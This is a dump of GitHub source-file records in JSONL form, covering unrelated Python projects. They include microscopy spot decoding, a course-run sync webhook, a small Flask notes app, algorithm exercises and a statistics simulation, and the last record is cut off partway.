np.ndarray\n An image where all pixels of a connected component share the same integer ID\n intensities : IntensityTable\n decoded intensities\n\n Returns\n -------\n IntensityTable :\n an IntensityTable where the number of features equals the number of connected components\n and the intensities of each each feature is its mean trace.\n\n \"\"\"\n\n pixel_labels = label_image.reshape(-1)\n\n # Use a pandas groupby approach-based approach, because it is much faster than xarray\n\n # If needed, it is possible to be even faster than pandas:\n # https://stackoverflow.com/questions/51975512/\\\n # faster-alternative-to-perform-pandas-groupby-operation\n\n # stack intensities\n stacked = intensities.stack(traces=(Axes.ROUND.value, Axes.CH.value))\n\n # drop into pandas to use their faster groupby\n traces: pd.DataFrame = pd.DataFrame(\n stacked.values,\n index=pixel_labels,\n columns=stacked.traces.to_index()\n )\n\n #\n distances: pd.Series = pd.Series(\n stacked[Features.DISTANCE].values, index=pixel_labels\n )\n\n grouped = traces.groupby(level=0)\n pd_mean_pixel_traces = grouped.mean()\n\n grouped = distances.groupby(level=0)\n pd_mean_distances = grouped.mean()\n\n pd_xarray = IntensityTable(\n pd_mean_pixel_traces,\n dims=(Features.AXIS, 'traces'),\n coords=dict(\n traces=('traces', pd_mean_pixel_traces.columns),\n distance=(Features.AXIS, pd_mean_distances),\n features=(Features.AXIS, pd_mean_pixel_traces.index)\n )\n )\n mean_pixel_traces = pd_xarray.unstack('traces')\n\n # the 0th pixel trace corresponds to background. If present, drop it.\n try:\n mean_pixel_traces = mean_pixel_traces.drop_sel({Features.AXIS: 0})\n except KeyError:\n pass\n\n return cast(IntensityTable, mean_pixel_traces)\n\n @staticmethod\n def _single_spot_attributes(\n spot_property: _RegionProperties,\n decoded_image: np.ndarray,\n target_map: TargetsMap,\n min_area: Number,\n max_area: Number,\n ) -> Tuple[Dict[str, Union[Number, str]], int]:\n \"\"\"\n Calculate starfish SpotAttributes from the RegionProperties of a connected component\n feature.\n\n Parameters\n ----------\n spot_property: _RegionProperties\n Properties of the connected component. Output of skimage.measure.regionprops\n decoded_image : np.ndarray\n Image whose pixels correspond to the targets that the given position in the ImageStack\n decodes to.\n target_map : TargetsMap\n Unique mapping between string target names and int target IDs.\n min_area :\n Combined features with area below this value are marked as failing filters\n max_area : Number\n Combined features with area above this value are marked as failing filters\n\n Returns\n -------\n Dict[str, Union[Number, str]] :\n spot attribute dictionary for this connected component, containing\n the x, y, z position, target name (str) and feature radius.\n int :\n 1 if spot passes size filters, zero otherwise.\n\n \"\"\"\n # because of the above skimage issue, we need to support both 2d and 3d properties\n centroid = spot_property.centroid\n\n spot_attrs: Dict[str, Union[Number, str]]\n if len(centroid) == 3:\n spot_attrs = {\n 'z': int(centroid[0]),\n 'y': int(centroid[1]),\n 'x': int(centroid[2])\n }\n else: # data is 2d\n spot_attrs = {\n 'z': 0,\n 'y': int(centroid[0]),\n 'x': int(centroid[1])\n }\n\n # define the target index as the most repeated value in the bounding box of the spot.\n # it appears there is no simpler way to do this with a regionprops object\n bbox = spot_property.bbox\n if len(bbox) == 6:\n # 3d bbox\n target_candidates = np.ndarray.flatten(\n decoded_image[bbox[0]:bbox[3], bbox[1]:bbox[4], bbox[2]:bbox[5]])\n else:\n # flatten and remove zeros\n target_candidates = np.ndarray.flatten(\n decoded_image[0, bbox[0]:bbox[2], bbox[1]:bbox[3]])\n # get the most repeated nonzero value\n non_zero_target_candidates = target_candidates[target_candidates != 0]\n target_index = cast(int, np.argmax(np.bincount(non_zero_target_candidates)))\n spot_attrs[Features.TARGET] = target_map.target_as_str(target_index)\n spot_attrs[Features.SPOT_RADIUS] = spot_property.equivalent_diameter / 2\n\n # filter intensities for which radius is too small\n passes_area_filter = 1 if min_area <= spot_property.area < max_area else 0\n return spot_attrs, passes_area_filter\n\n def _create_spot_attributes(\n self,\n region_properties: List[_RegionProperties],\n decoded_image: np.ndarray,\n target_map: TargetsMap,\n n_processes: Optional[int] = None\n ) -> Tuple[SpotAttributes, np.ndarray]:\n \"\"\"\n\n Parameters\n ----------\n region_properties : List[_RegionProperties]\n Properties of the each connected component. Output of skimage.measure.regionprops\n decoded_image : np.ndarray\n Image whose pixels correspond to the targets that the given position in the ImageStack\n decodes to.\n target_map : TargetsMap\n Unique mapping between string target names and int target IDs.\n n_processes : Optional[int]=None\n number of processes to devote to measuring spot properties. If None, defaults to the\n result of os.nproc()\n\n Returns\n -------\n pd.DataFrame :\n DataFrame containing x, y, z, radius, and target name for each connected component\n feature.\n np.ndarray[bool] :\n An array with length equal to the number of features. If zero, indicates that a feature\n has failed area filters.\n \"\"\"\n with ThreadPoolExecutor(max_workers=n_processes) as tpe:\n mapfunc = tpe.map\n applyfunc = partial(\n self._single_spot_attributes,\n decoded_image=decoded_image,\n target_map=target_map,\n min_area=self._min_area,\n max_area=self._max_area\n )\n\n iterable = tqdm(region_properties, disable=(not StarfishConfig().verbose))\n results = mapfunc(applyfunc, iterable)\n if not results:\n # no spots found\n warnings.warn(\"No spots found, please adjust threshold parameters\")\n return SpotAttributes.empty(extra_fields=['target']), np.array(0, dtype=bool)\n spot_attrs, passes_area_filter = zip(*results)\n\n # update passes filter\n passes_filter = np.array(passes_area_filter, dtype=bool)\n\n spot_attributes = SpotAttributes(pd.DataFrame.from_records(spot_attrs))\n spot_attributes.data[Features.SPOT_ID] = np.arange(0, len(spot_attributes.data))\n return spot_attributes, passes_filter\n\n def run(\n self, intensities: IntensityTable,\n n_processes: Optional[int] = None,\n ) -> Tuple[DecodedIntensityTable, ConnectedComponentDecodingResult]:\n \"\"\"\n Execute the combine_adjacent_features method on an IntensityTable containing pixel\n intensities\n\n Parameters\n ----------\n intensities : IntensityTable\n Pixel intensities of an imaging experiment\n n_processes : Optional[int]\n Number of parallel processes to devote to calculating the filter\n\n Returns\n -------\n IntensityTable :\n Table whose features comprise sets of adjacent pixels that decoded to the same target\n ConnectedComponentDecodingResult :\n NamedTuple containing :\n region_properties :\n the properties of each connected component, in the same order as the\n IntensityTable\n label_image : np.ndarray\n An image where all pixels of a connected component share the same integer ID\n decoded_image : np.ndarray\n Image whose pixels correspond to the targets that the given position in the\n ImageStack decodes to.\n\n \"\"\"\n\n # map target molecules to integers so they can be reshaped into an image that can\n # be subjected to a connected-component algorithm to find adjacent pixels with the\n # same targets\n targets = intensities[Features.TARGET].values\n target_map = TargetsMap(targets)\n\n # create the decoded_image\n decoded_image = self._intensities_to_decoded_image(\n intensities,\n target_map,\n self._mask_filtered,\n )\n\n # label the decoded image to extract connected component features\n label_image: np.ndarray = label(decoded_image, connectivity=self._connectivity)\n\n # calculate properties of each feature\n props: List = regionprops(np.squeeze(label_image))\n\n # calculate mean intensities across the pixels of each feature\n mean_pixel_traces = self._calculate_mean_pixel_traces(\n label_image,\n intensities,\n )\n\n # Create SpotAttributes and determine feature filtering outcomes\n spot_attributes, passes_filter = self._create_spot_attributes(\n props,\n decoded_image,\n target_map,\n n_processes=n_processes\n )\n\n # augment the SpotAttributes with filtering results and distances from nearest codes\n spot_attributes.data[Features.DISTANCE] = mean_pixel_traces[Features.DISTANCE]\n spot_attributes.data[Features.PASSES_THRESHOLDS] = passes_filter\n\n # create new indexes for the output IntensityTable\n channel_index = mean_pixel_traces.indexes[Axes.CH]\n round_index = mean_pixel_traces.indexes[Axes.ROUND]\n coords = IntensityTable._build_xarray_coords(\n spot_attributes=spot_attributes,\n round_values=round_index,\n channel_values=channel_index)\n\n # create the output IntensityTable\n dims = (Features.AXIS, Axes.ROUND.value, Axes.CH.value)\n intensity_table = DecodedIntensityTable(\n data=mean_pixel_traces, coords=coords, dims=dims\n )\n\n # combine the various non-IntensityTable results into a NamedTuple before returning\n ccdr = ConnectedComponentDecodingResult(props, label_image, decoded_image)\n\n return intensity_table, ccdr\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/spots/DetectPixels/combine_adjacent_features.py","file_name":"combine_adjacent_features.py","file_ext":"py","file_size_in_byte":16807,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"15049829903","text":"from random import randint\n\ndef find_el(i, j, matrix, k):\n\n if k == matrix[i][j]:\n return f'Элемент {k} дайден в ячейке {i+1}, {j+1}.'\n try:\n if k > matrix[i][j]:\n return find_el(i+1, j, matrix, k)\n else:\n return find_el(i, j-1, matrix, k)\n except:\n return f'Элемента {k} нет в матрице'\n\n \n\nm = int(input('Введите количство строк: '))\nn = int(input('Введите количество столбцов: '))\n\nmatrix = [[] for i in range(m)]\nmatrix[0].append(randint(1, 10))\nfor i in range(n-1):\n matrix[0].append(randint(matrix[0][i]+1, matrix[0][i]+10))\n\nfor j in range(1, m):\n matrix[j].append(randint(matrix[j-1][0]+1, matrix[j-1][0]+10))\n\nfor i in range(1, m):\n for j in range(1, n):\n matrix[i].append(randint(max(matrix[i-1][j], matrix[i][j-1])+1, max(matrix[i-1][j], matrix[i][j-1])+10))\n\nprint()\nprint('Сгенерированная матрица:')\nfor i in range(m):\n print(', '.join([str(i) for i in matrix[i]]))\n\nprint()\nk = int(input('Введите искомый элемент: '))\n\nprint(find_el(0, n-1, matrix, k))\n\n\n","repo_name":"Kostik2302/asd-lab-5","sub_path":"Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39100452848","text":"# 14.實作\n\ndef calculate_bmi(h, w):\n BMI = float(w / (h / 100) ** 2)\n return BMI\n\n\nheight = float(input(\"請輸入身高(cm):\"))\nweight = float(input(\"請輸入體重(kg):\"))\n\nBMI = calculate_bmi(height, weight)\nprint(\"身高:\", height, \"體重:\", weight)\nprint(\"BMI:\", BMI)\n","repo_name":"vicwei8128/Python_practise","sub_path":"workspace/Simple_work14.py","file_name":"Simple_work14.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39442072083","text":"\"\"\"\nAPI endpoints for the courses app.\n\"\"\"\nfrom django.conf import settings\nfrom django.db.models import Q\n\nfrom cms import signals as cms_signals\nfrom cms.models import Page\nfrom rest_framework.decorators import api_view\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import as_serializer_error\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom .exceptions import MissingResourceLinkError\nfrom .lms import LMSHandler\nfrom .models import Course, CourseRun, CourseRunSyncMode\nfrom .serializers import CourseRunSerializer\nfrom .utils import get_signature, normalize_code\n\n\nclass NotAllowed(BasePermission):\n \"\"\"\n Utility permission class to deny all requests. This is used as a default to close\n requests to unsupported actions.\n \"\"\"\n\n def has_permission(self, request, view):\n \"\"\"\n Always deny permission.\n \"\"\"\n return False\n\n\nclass CourseRunsViewSet(ModelViewSet):\n \"\"\"\n API endpoints to access and perform actions on course runs.\n \"\"\"\n\n permission_classes = [NotAllowed]\n queryset = CourseRun.objects.all()\n serializer_class = CourseRunSerializer\n\n def get_permissions(self):\n \"\"\"\n Manage permissions for builtin DRF methods on ViewSets.\n \"\"\"\n if self.action == \"retrieve\":\n permission_classes = []\n else:\n try:\n permission_classes = getattr(self, self.action).kwargs.get(\n \"permission_classes\"\n )\n except AttributeError:\n permission_classes = self.permission_classes\n\n return [permission() for permission in permission_classes]\n\n\n# pylint: disable=too-many-locals,too-many-branches\ndef sync_course_run(data):\n \"\"\" \"\n Synchronize a course run from its data.\n\n Parameters\n ----------\n data : dict\n A dictionary describing a course run of the form:\n {\n \"resource_link\": \"http://example.edx:8073/courses/course-v1:edX+DemoX+01/course/\",\n \"start\": \"2020-12-09T09:31:59.417817Z\",\n \"end\": \"2021-03-14T09:31:59.417895Z\",\n \"enrollment_start\": \"2020-11-09T09:31:59.417936Z\",\n \"enrollment_end\": \"2020-12-24T09:31:59.417972Z\",\n \"languages\": [\"en\", \"fr\"],\n \"enrollment_count\": 42,\n \"catalog_visibility\": \"course_and_search\",\n }\n\n Returns\n -------\n None or raises:\n MissingResourceLinkError: the data dictionary is missing a \"resource_link\" key\n ValidationError: something is wrong in the data. The error dict describes the error.\n\n \"\"\"\n # Select LMS from resource link\n resource_link = data.get(\"resource_link\")\n if not resource_link:\n raise MissingResourceLinkError()\n\n lms = LMSHandler.select_lms(resource_link)\n if lms is None:\n raise ValidationError(\n {\"resource_link\": [\"No LMS configuration found for this resource link.\"]}\n )\n sync_mode = lms.default_course_run_sync_mode\n\n target_course_runs = CourseRun.objects.filter(resource_link=resource_link)\n draft_course_runs = target_course_runs.filter(draft_course_run__isnull=True)\n\n # Clean data before instiating a serializer with it\n cleaned_data = lms.clean_course_run_data(data)\n serializer = lms.get_course_run_serializer(\n cleaned_data, partial=bool(draft_course_runs)\n )\n\n if serializer.is_valid() is not True:\n raise ValidationError(serializer.errors)\n validated_data = serializer.validated_data\n\n if draft_course_runs:\n # Remove fields that are protected for update\n validated_data = {\n key: value\n for (key, value) in validated_data.items()\n if key not in lms.configuration.get(\"COURSE_RUN_SYNC_NO_UPDATE_FIELDS\", [])\n }\n\n for course_run in draft_course_runs.filter(\n sync_mode__in=[\n CourseRunSyncMode.SYNC_TO_DRAFT,\n CourseRunSyncMode.SYNC_TO_PUBLIC,\n ]\n ):\n nb_updated = CourseRun.objects.filter(\n Q(pk=course_run.pk)\n | Q(\n draft_course_run__sync_mode=CourseRunSyncMode.SYNC_TO_PUBLIC,\n draft_course_run=course_run,\n )\n ).update(**validated_data)\n\n public_course = course_run.direct_course.public_extension\n if course_run.sync_mode == CourseRunSyncMode.SYNC_TO_PUBLIC:\n if public_course:\n # If the public course run did not exist yet it has to be created\n if nb_updated == 1:\n public_course.copy_relations(course_run.direct_course)\n\n # What we did has changed the public course page. We must reindex it\n cms_signals.post_publish.send(\n sender=Page,\n instance=course_run.direct_course.extended_object,\n language=None,\n )\n else:\n course_run.refresh_from_db()\n course_run.mark_course_dirty()\n return\n\n # We need to create a new course run\n if lms.default_course_run_sync_mode == CourseRunSyncMode.MANUAL:\n raise ValidationError(\n {\"resource_link\": [\"Unknown course run when creation is deactivated.\"]}\n )\n\n # Look for the course targeted by the resource link\n course_code = normalize_code(lms.extract_course_code(data))\n try:\n course = Course.objects.distinct().get(\n code=course_code,\n extended_object__publisher_is_draft=True,\n # Exclude snapshots\n extended_object__node__parent__cms_pages__course__isnull=True,\n )\n except Course.DoesNotExist as exc:\n # Create the course page in draft\n raise ValidationError(\n {\"resource_link\": [f\"Unknown course: {course_code:s}.\"]}\n ) from exc\n\n # Instantiate a new draft course run\n draft_course_run = CourseRun(\n direct_course=course, sync_mode=sync_mode, **validated_data\n )\n\n # Create the related public course run if necessary\n if sync_mode == CourseRunSyncMode.SYNC_TO_PUBLIC:\n # Don't mark the related course page dirty and directly add\n # the course run to the corresponding public course page\n draft_course_run.save()\n if course.public_extension_id:\n public_course_run = CourseRun(\n direct_course=course.public_extension,\n draft_course_run=draft_course_run,\n sync_mode=sync_mode,\n **validated_data,\n )\n public_course_run.save()\n\n # What we did has changed the public course page. We must reindex it\n cms_signals.post_publish.send(\n sender=Page, instance=course.extended_object, language=None\n )\n else:\n # Save the draft course run marking the course page dirty\n draft_course_run.save()\n draft_course_run.mark_course_dirty()\n\n\n# pylint: disable=too-many-return-statements,unused-argument, too-many-locals,too-many-branches\n@api_view([\"POST\"])\ndef sync_course_runs_from_request(request, version):\n \"\"\"View for the web hook to create or update course runs based on their resource link.\n\n - An existing course run is updated only if its \"sync_mode\" field is set to something else\n than \"manual\".\n\n - The public version of a course run is updated only if its \"sync_mode\" field is set to\n \"sync_to_public\". Otherwise, only the draft version is updated and the related course\n is marked dirty.\n\n - A new course run is created only if the \"DEFAULT_COURSE_RUN_SYNC_MODE\" parameter is set\n to something else than \"manual\" in the lms configuration (or the setting\n \"RICHIE_DEFAULT_COURSE_RUN_SYNC_MODE\" in the absence of LMS preference). Otherwise, only\n existing course runs are updated.\n\n - A new public course run is created only if the \"DEFAULT_COURSE_RUN_SYNC_MODE\" parameter\n is set to \"sync_to_public\" in the lms configuration (or the setting\n \"RICHIE_DEFAULT_COURSE_RUN_SYNC_MODE\" in the absence of LMS preference). Otherwise, only\n the draft course run is created and the related course is marked dirty.\n\n Parameters\n ----------\n request : Type[django.http.request.HttpRequest]\n The request on the API endpoint, it should contain a payload with course run fields.\n\n Returns\n -------\n Type[rest_framework.response.Response]\n HttpResponse acknowledging the success or failure of the synchronization operation.\n \"\"\"\n message = request.body.decode(\"utf-8\")\n\n # Check if the provided signature is valid against any secret in our list\n #\n # We need to do this to support 2 or more versions of our infrastructure at the same time.\n # It then enables us to do updates and change the secret without incurring downtime.\n authorization_header = request.headers.get(\"Authorization\")\n if not authorization_header:\n return Response(\"Missing authentication.\", status=403)\n\n signature_is_valid = any(\n authorization_header == get_signature(message, secret)\n for secret in getattr(settings, \"RICHIE_COURSE_RUN_SYNC_SECRETS\", [])\n )\n\n if not signature_is_valid:\n return Response(\"Invalid authentication.\", status=401)\n\n if isinstance(request.data, (list, tuple)):\n result = {}\n status = 200\n if not all(\"resource_link\" in d for d in request.data):\n return Response({\"resource_link\": [\"This field is required.\"]}, status=400)\n for data in request.data:\n try:\n sync_course_run(data)\n except ValidationError as error:\n result[data[\"resource_link\"]] = as_serializer_error(error)\n status = 400\n else:\n result[data[\"resource_link\"]] = {\"success\": True}\n return Response(result, status=status)\n\n try:\n sync_course_run(request.data)\n except MissingResourceLinkError:\n return Response({\"resource_link\": [\"This field is required.\"]}, status=400)\n\n return Response({\"success\": True})\n","repo_name":"openfun/richie","sub_path":"src/richie/apps/courses/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10303,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"11839374080","text":"# This file is part of swprocess, a Python package for surface wave processing.\r\n# Copyright (C) 2020 Joseph P. Vantassel (joseph.p.vantassel@gmail.com)\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\"\"\"Test for interact module.\"\"\"\r\n\r\nimport warnings\r\nfrom unittest.mock import patch\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom swprocess.interact import ginput_session\r\nfrom testtools import unittest, TestCase\r\n\r\n\r\nclass Test_Interact(TestCase):\r\n\r\n @patch('matplotlib.pyplot.ginput', return_value=[(0.5, 0.5), (0, 1)])\r\n @patch('matplotlib.pyplot.waitforbuttonpress', return_value=True)\r\n def test_ginput_session(self, input_a, input_b):\r\n _, ax = plt.subplots()\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n xs, ys = ginput_session(ax=ax, npts=2, initial_adjustment=True,\r\n ask_to_continue=True)\r\n\r\n self.assertListEqual([0], xs)\r\n self.assertListEqual([1], ys)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"jpvantassel/swprocess","sub_path":"test/test_interact.py","file_name":"test_interact.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"73428902506","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///clients.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass Article(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n tel = db.Column(db.String(20))\n type = db.Column(db.String(10))\n device = db.Column(db.String(100))\n defect = db.Column(db.Text)\n description = db.Column(db.Text)\n date = db.Column(db.DateTime, default=datetime.utcnow)\n part_price = db.Column(db.Integer())\n total_price = db.Column(db.Integer())\n income = db.Column(db.Integer)\n\n def __repr__(self):\n return '
' % self.id\n\n\n'''\n@app.route('/')\n@app.route('/home')\ndef index():\n #first way was:\n #return render_template('index.html')\n #then this:\n arts = Article.query.order_by(Article.date.desc()).all()\n return render_template('posts.html', arts=arts)\n'''\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\n@app.route('/', methods=['POST', 'GET'])\n@app.route('/home', methods=['POST', 'GET'])\ndef posts():\n # get first element from table\n # articles = Article.query.first()\n # get all elements\n # articles = Article.query.all()\n # get all elements sorted by column\n\n if request.method == \"POST\":\n find = request.form['find']\n find = find.lower()\n \n articles = Article.query.order_by(Article.date.desc()).all()\n\n texts = []\n for el in articles:\n s = \"{} {} {} {} {} {} {} {} {}\".format(el.name, el.tel, el.type, el.device, el.defect, el.description, el.part_price, el.total_price, el.income).lower()\n texts.append(s)\n \n matches = []\n for row in texts:\n if find in row:\n matches.append(texts.index(row))\n \n arts = []\n for index in matches:\n arts.append(articles[index])\n \n return render_template('posts.html', arts=arts)\n \n else:\n \n arts = Article.query.order_by(Article.date.desc()).all()\n return render_template('posts.html', arts=arts)\n\n\n@app.route('/posts/')\ndef post_detail(id):\n article = Article.query.get(id)\n return render_template('post_detail.html', article=article)\n\n\n@app.route('/posts//delete')\ndef post_delete(id):\n article = Article.query.get_or_404(id)\n\n try:\n db.session.delete(article)\n db.session.commit()\n return redirect('/')\n except:\n return \"Error. Post not delete...\"\n\n\n@app.route('/create_article', methods=['POST', 'GET'])\ndef create_article():\n if request.method == \"POST\":\n name = request.form['name']\n tel = request.form['tel']\n type = request.form['type']\n device = request.form['device']\n defect = request.form['defect']\n description = request.form['description']\n part_price = request.form['part_price']\n total_price = request.form['total_price']\n income = int(total_price) - int(part_price)\n # print(type(part_price))\n # print(type(total_price))\n\n article = Article(name=name,\n tel=tel,\n type=type,\n device=device,\n defect=defect,\n description=description,\n part_price=part_price,\n total_price=total_price,\n income=income\n )\n\n db.session.add(article)\n db.session.commit()\n return redirect('/')\n\n # except: return \"There was an error adding the article...\"\n\n else:\n return render_template('create_article.html')\n\n\n@app.route('/post//update', methods=['POST', 'GET'])\ndef post_update(id):\n article = Article.query.get(id)\n if request.method == \"POST\":\n article.name = request.form['name']\n article.tel = request.form['tel']\n article.type = request.form['type']\n article.device = request.form['device']\n article.defect = request.form['defect']\n article.description = request.form['description']\n article.part_price = request.form['part_price']\n article.total_price = request.form['total_price']\n # article.total_price = request.form['income']\n\n try:\n db.session.commit()\n return redirect('/')\n except:\n return \"An error occurred while editing the article...\"\n\n else:\n return render_template('post_update.html', article=article)\n\n\n'''\n@app.route('/user//')\ndef user(name, id):\n return f\"User: {name}, id: {id}.\"\n'''\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n","repo_name":"Uarsa/blog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34910425391","text":"import collections\nimport heapq\n\nclass Solution:\n def treasureIsland(self, grid):\n q = [(0, 0, 0)]\n visited = set()\n visited.add((0, 0))\n while q:\n i, j, dist = q.pop(0)\n if i == len(grid)-1 and j == 0:\n return dist\n\n elif grid[i][j] == 'O':\n for r, c in ((-1, 0), (1, 0), (0, 1), (0, -1)):\n newr, newc = i+r, j+c\n if 0 <= newr < len(grid) and 0 <= newc < len(grid[0]):\n if grid[newr][newc] != \"D\" and (newr, newc) not in visited:\n q.append((newr, newc, dist+1))\n visited.add((newr, newc))\n\n\nif __name__==\"__main__\":\n solution = Solution()\n print(solution.treasureIsland([['O', 'O', 'O', 'O'],\n ['D', 'O', 'D', 'O'],\n ['O', 'O', 'O', 'O'],\n ['X', 'D', 'D', 'O']]))\n","repo_name":"ashwin2509/Leetcode","sub_path":"Amazon/TreasureIsland.py","file_name":"TreasureIsland.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23036133304","text":"#! /usr/bin/env python\n\n# Copy the attributeLocation from SOURCE to TARGET. Output to stdout.\n\nimport sys\n\ndef addToEntNames(prop2EntNames, prop, entName):\n if prop not in prop2EntNames:\n prop2EntNames[prop] = set()\n prop2EntNames[prop].add(entName)\n\nif len(sys.argv) < 3:\n sys.stderr.write('SYNOPSIS\\n')\n sys.stderr.write(' python %s SOURCE TARGET\\n' % sys.argv[0])\n exit()\n\nsource = sys.argv[1]\ntarget = sys.argv[2]\n\nprop2EntNames = {}\n\n# Read CSV's into lists\nwith open(source) as f:\n linesS = f.read().splitlines()\nwith open(target) as f:\n linesT = f.read().splitlines()\n\n# Transform each CSV row to a list too\nfor i in range(len(linesS)):\n linesS[i] = linesS[i].split(',')\nfor i in range(len(linesT)):\n linesT[i] = linesT[i].split(',')\n\n# Extract the faimsEntityAttributeName/attributeLocation pairs from the source\nfor i in range(len(linesS)):\n propS = linesS[i][3]\n entNameS = linesS[i][5]\n addToEntNames(prop2EntNames, propS, entNameS)\n\n# Transform prop2EntNames from a string -> set() map to a string -> string map\nfor k in prop2EntNames.iterkeys():\n prop2EntNames[k] = ';'.join(prop2EntNames[k])\n\n# Augment the target CSV to include attributeLocations which were extracted\ninsertionPos = 2\nlinesT[0].insert(insertionPos, 'attributeLocation')\nfor i in range(1, len(linesT)):\n propT = linesT[i][1]\n if propT in prop2EntNames:\n entName = prop2EntNames[propT]\n linesT[i].insert(insertionPos, entName)\n else:\n linesT[i].insert(insertionPos, '')\n\n# Transform each list representing a row in the target to a string\nfor i in range(len(linesT)):\n linesT[i] = ','.join(linesT[i])\n\n# Print the result: the transformed target\nfor i in range(len(linesT)):\n sys.stdout.write(linesT[i] + '\\n')\n","repo_name":"shainarussell/Turtle-survey-FAIMS","sub_path":"xml-tools/cp-attrib-location/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37180825900","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Name: Rawan Osama Baker \n# ID: 221002179\n\n# In[56]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n# In[52]:\n\n\nrate = 0.25\n#Population mean is going to be\nmu = 1/rate\n\nAvrage = []\ndef simulate_central_limit(random_samples,sample_size):\n Avrage = []\n for i in range(random_samples):\n Each_Thorw = []\n\n random_sample=(np.random.exponential((1 / rate), sample_size))\n\n Avrage.append(np.mean(random_sample))\n \n avg_each_roll = Avrage\n mean = np.mean(Avrage)\n var = np.var(Avrage)\n return avg_each_roll, mean, var\n\n\n# In[53]:\n\n\navgs1, mean1, var1 = simulate_central_limit(50,2)\n\n\n#Second exp\n# use another 5000 random samples ,sample size= 500\navgs2, mean2, var2 = simulate_central_limit(5000,500)\n\nprint(\"First 50 random samples: \")\nprint(\"Mean = {0:f}, Variance = {1:f}\".format(mean1, var1))\nprint(\"Average of outcomes in each case: \", avgs1, \"\\n\")\n\nprint(\"Another 50 random samples: \")\nprint(\"Mean = {0:f}, Variance = {1:f}\".format(mean2, var2))\nprint(\"Average of outcomes in each case: \", avgs2, \"\\n\")\n\n\n# In[54]:\n\n\nplt.hist(avgs1, bins=100);\n# plt.title('Histogram of first random 50 samples');\n\n\n# In[55]:\n\n\n# use another 5000 random samples ,sample size= 500 (Secand exp)\nplt.hist(avgs2, bins=100);\nplt.title('Histogram of another 50 random samples: ' );\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rawann99/Central-Limit-theorem","sub_path":"221002179 Assighment_2.py","file_name":"221002179 Assighment_2.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36573128001","text":"\r\nimport struct\r\nimport sys\r\nfrom datetime import datetime, timedelta\r\nimport uuid\r\nfrom pyout.enums.mapi import MapiEnum\r\n\r\n\r\nclass MapiProps:\r\n\r\n OLETIME_INIT = datetime(1899, 12, 30)\r\n SYSTIME_INIT = datetime(1601, 1, 1)\r\n\r\n class NeedGuidError(Exception):\r\n\r\n def __init__(self):\r\n Exception.__init__(self, \"GUID and propMap expected.\")\r\n\r\n class ArrayMismatchError(Exception):\r\n\r\n def __init__(self):\r\n Exception.__init__(self, \"Property type and data array mismatch.\")\r\n\r\n class WrongTypeError(Exception):\r\n\r\n def __init__(self, propTag):\r\n Exception.__init__(self, \"Unknown type 0x{:04X}.\".format(propTag & 0xFFFF))\r\n\r\n class Prop:\r\n \"\"\" Mapi property holder \"\"\"\r\n\r\n IDTYPE_NUMBER = 0\r\n IDTYPE_STRING = 1\r\n\r\n def __init__(self, propTag, data=None, **kwargs):\r\n \"\"\" Create prop tag.\r\n kwargs:\r\n type - MapiEnum.PT_ - change prop type\r\n guid - named property guid\r\n map - named property map (int or str/unicode)\r\n \"\"\"\r\n self.propTag = propTag\r\n self.data = None if data is None else MapiProps.pad(data)\r\n if 'type' in kwargs:\r\n self.propTag = (self.propTag & 0xFFFF0000) | kwargs['type']\r\n self.guid = kwargs.get('guid')\r\n self.map = kwargs.get('map')\r\n if self.propTag > 0x80000000 and not self.guid:\r\n raise MapiProps.NeedGuidError()\r\n if self.guid and self.map is None:\r\n raise MapiProps.NeedGuidError()\r\n\r\n def dumpTnef(self):\r\n ret = struct.pack('I', self.propTag)\r\n if self.guid:\r\n ret += 